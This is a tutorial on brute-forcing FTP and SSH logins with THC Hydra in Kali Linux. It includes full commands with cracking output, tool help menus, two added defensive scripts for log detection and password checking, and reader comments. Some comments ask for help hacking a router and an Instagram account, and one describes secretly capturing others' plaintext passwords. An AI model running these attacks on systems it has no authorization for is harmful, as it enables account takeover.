For years, experts have warned about the risks of relying on weak passwords to restrict access to data, and this is still a problem. A rule of thumb for passwords is the longer, the better. In this guide I will use FTP as a target service and will show how to crack passwords in Kali Linux with Hydra.
Several login cracking tools already exist, but none of them supports more than one protocol to attack or parallelized connections. We’ve previously covered password cracking using John the Ripper, Wireshark, NMAP and MiTM.
Hydra can be used and compiled cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.
Currently the THC Hydra tool supports the following protocols:
Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
Supported Platforms
- All UNIX platforms (linux, *bsd, solaris, etc.)
- Mac OS/X
- Windows with Cygwin (both IPv4 and IPv6)
- Mobile systems based on Linux, Mac OS/X or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager. On Kali Linux, it is pre-installed.
For brute forcing, Hydra needs a list of passwords. There are lots of password lists available out there. In this example we are going to use the default password list provided with John the Ripper, which is another password cracking tool. Other password lists are available online, simply Google it.
John the Ripper is pre-installed on Kali Linux and its password list can be found at the following location:
/usr/share/john/password.lst
It looks like this:
#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: http://www.openwall.com/wordlists/
#!comment:
#!comment: This list is based on passwords most commonly seen on a set of Unix
#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
#!comment: (that is, more common passwords are listed first). It has been
#!comment: revised to also include common website passwords from public lists
#!comment: of "top N passwords" from major community website compromises that
#!comment: occurred in 2006 through 2010.
#!comment:
#!comment: Last update: 2011/11/20 (3546 entries)
123456
12345
password
password1
123456789
12345678
1234567890
Create a copy of that file to your desktop or any location and remove the comment lines (all the lines above the password 123456). Now our word list of passwords is ready and we are going to use this to brute force an ftp server to try to crack its password.
Here is the simple command with output:
root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host: 192.168.1.1 login: admin password: password
[STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33
root@kali:~#
Check the line “[21][ftp]”. It mentions the username/password combination that worked for the ftp server. Quite easy!
Now let’s take a look at the options. The “t” option tells how many parallel threads Hydra should create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a short while. To avoid this it’s better to do 1 attempt at a time. The next option is “l”, which tells the username or login to use. In this case it’s admin. Next comes the capital “P” option, which provides the word list to use. Hydra will pick up each line as a single password and use it.
The “v” option is for verbose and the capital “V” option is for showing every password being tried. Last comes the host/IP address followed by the service to crack.
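Seen from the server side, the single-threaded run above is a burst of failed logins for one account from one client, here ending in a success. The following added example (not part of the original article) counts that pattern in FTP log lines; the vsftpd-style log format, the function names and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article): flag password guessing in FTP logs.
# Assumption: vsftpd-style log lines; the sample below is constructed.

sample_log() {
    cat <<'EOF'
Mon May 13 04:32:19 2013 [pid 2] [admin] FAIL LOGIN: Client "192.168.1.50"
Mon May 13 04:32:24 2013 [pid 2] [admin] FAIL LOGIN: Client "192.168.1.50"
Mon May 13 04:32:29 2013 [pid 2] [admin] FAIL LOGIN: Client "192.168.1.50"
Mon May 13 04:32:33 2013 [pid 2] [admin] OK LOGIN: Client "192.168.1.50"
Mon May 13 09:10:02 2013 [pid 2] [alice] FAIL LOGIN: Client "192.168.1.77"
Mon May 13 09:10:15 2013 [pid 2] [alice] OK LOGIN: Client "192.168.1.77"
Mon May 13 11:45:01 2013 [pid 2] [root] FAIL LOGIN: Client "192.168.1.60"
Mon May 13 11:45:06 2013 [pid 2] [root] FAIL LOGIN: Client "192.168.1.60"
Mon May 13 11:45:11 2013 [pid 2] [root] FAIL LOGIN: Client "192.168.1.60"
EOF
}

# detect_guessing LOGFILE [THRESHOLD]   ("-" reads the log from stdin)
# Prints "<client> <login> <failures> <verdict>" for every client/login pair
# with at least THRESHOLD failed logins. The verdict is SUCCESS_AFTER_FAILURES
# when a login succeeded after the threshold was reached (treat the account
# as compromised), otherwise GUESSING.
detect_guessing() {
    awk -v limit="${2:-5}" '
        $10 == "LOGIN:" && ($9 == "FAIL" || $9 == "OK") {
            login = $8;   gsub(/^\[|\]$/, "", login)
            client = $12; gsub(/"/, "", client)
            key = client " " login
            if ($9 == "FAIL") fails[key]++
            else if (fails[key] + 0 >= limit + 0) hit[key] = 1
        }
        END {
            for (key in fails)
                if (fails[key] + 0 >= limit + 0) {
                    verdict = (key in hit) ? "SUCCESS_AFTER_FAILURES" : "GUESSING"
                    print key, fails[key], verdict
                }
        }
    ' "$1" | sort
}

# Demo on the constructed sample with a threshold of 3 failures.
sample_log | detect_guessing - 3
```

A single mistyped password followed by a good login (the alice lines) stays below the threshold and is not reported.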
THC Hydra help menu
root@kali:~# hydra -h
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.:
  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
  % export HYDRA_PROXY_HTTP=http://proxy:8080
  % export HYDRA_PROXY_AUTH=user:pass

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5
hydra Usage Example
Attempt to login as the root user (-l root) using a password list (-P /usr/share/wordlists/metasploit/unix_passwords.txt) with 6 threads (-t 6) on the given SSH server (ssh://192.168.1.123):
root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22
Brute forcing is the most basic form of password cracking. It works well with devices like routers, which are mostly configured with their default passwords. However, when it comes to other systems, brute forcing will not work unless you are very lucky.
Still, brute forcing is good practice for hackers, so you should keep trying all techniques to hack a system. So keep hacking!!
Additional tools bundled with THC Hydra
pw-inspector
It reads passwords in and prints those which meet the requirements.
pw-inspector help menu
root@kali:~# pw-inspector
PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:
  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.
pw-inspector Usage Example
Read in a list of passwords (-i /usr/share/wordlists/nmap.lst) and save to a file (-o /root/passes.txt), selecting passwords of a minimum length of 6 (-m 6) and a maximum length of 10 (-M 10):
root@kali:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o /root/passes.txt -m 6 -M 10
root@kali:~# wc -l /usr/share/wordlists/nmap.lst
5086 /usr/share/wordlists/nmap.lst
root@kali:~# wc -l /root/passes.txt
4490 /root/passes.txt
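The pw-inspector help text names a defensive use: check a proposed password and reject it when it fails the requirements. The shell functions below are an added example of that check (not from the original article and not pw-inspector's own code), extended to also refuse anything found in a John-format wordlist; the helper names, default limits and sample list are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the article, and not pw-inspector itself): reject a
# proposed password that a dictionary run would find or that is too simple.
# Helper names are hypothetical; the wordlist is a constructed sample in the
# John the Ripper layout (#!comment: header, then one password per line).
LC_ALL=C; export LC_ALL   # make the [a-z] / [A-Z] ranges byte-exact

sample_wordlist() {
    cat <<'EOF'
#!comment: constructed sample, not the real password.lst
123456
12345
password
password1
EOF
}

# count_sets PASSWORD: how many of lower/upper/digit/other classes it uses.
count_sets() {
    n=0
    case $1 in *[a-z]*) n=$((n + 1)) ;; esac
    case $1 in *[A-Z]*) n=$((n + 1)) ;; esac
    case $1 in *[0-9]*) n=$((n + 1)) ;; esac
    case $1 in *[!a-zA-Z0-9]*) n=$((n + 1)) ;; esac
    echo "$n"
}

# check_password PASSWORD WORDLIST [MINLEN] [MINSETS]
# Prints a verdict; returns 0 only when the password is acceptable.
check_password() {
    pw=$1; wl=$2; minlen=${3:-12}; minsets=${4:-2}
    # Exact fixed-string match, skipping the list's comment header.
    if grep -v '^#!comment:' "$wl" | grep -Fxq -e "$pw"; then
        echo "reject: in wordlist"; return 1
    fi
    if [ "${#pw}" -lt "$minlen" ]; then
        echo "reject: shorter than $minlen characters"; return 1
    fi
    if [ "$(count_sets "$pw")" -lt "$minsets" ]; then
        echo "reject: fewer than $minsets character sets"; return 1
    fi
    echo "accept"
}

demo_list=$(mktemp); sample_wordlist > "$demo_list"
for candidate in password1 Summer2013 'Blue-Kettle-7-Orbit'; do
    printf '%s: ' "$candidate"
    check_password "$candidate" "$demo_list" || true
done
rm -f "$demo_list"
```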
Resources
Source: http://www.thc.org/thc-hydra/
- Author: Van Hauser, Roland Kessler
but you need wordlist :/
That is why the author mentioned people still making mistake of not making their password secure enough, basically this to get low hanging fruits for further recon
i want to hack a tenda 11n router by hydra its not have admin or username its only have password
In ifconfig I can’t find inet addr? Need help
use the command ip addr
when I type the command /usr/share/john/password.lst it is showing the permission denied
is there any solution
try “cp /usr/share/john/password.lst Desktop”
uh come back when you can bruteforce passwords such as aiVu/tiedae7aix9oeg%aeveipoo*nohquocheizee9Phae#mei:V3dooj=u*ibo in real time (or close to) on affordable hardware
bruh bruteforcing a password takes at least 14 hours for an average 7 letter password… you will have more success calling and asking them for their password
i know which this doesn’t seem very impressive to me
wordlists/rainbowtables can get huge fast, rainbowtables have problems of their own, foreign languages can make wordlists useless
and, like you said, bruteforcing takes a long time (we brute forced a few md5 hashes for our classes php board back in 2003 and the longest one we got was 7 chars long and took days on a dualcpu p3 450mhz), then i thought about it and just modified the login page to store the unencrypted password…. everyone wondered how we could do any password at once :)
i have getting this like cracking with hydra
We interviewed the developer of THC Hydra – thought you’d be interested to read their comments:
https://www.concise-courses.com/interview-thc-hydra/
How to install hydra on nethunter?
Very good article. I’m dealing with a few of these issues as well..
plzz help me to hack instagram acc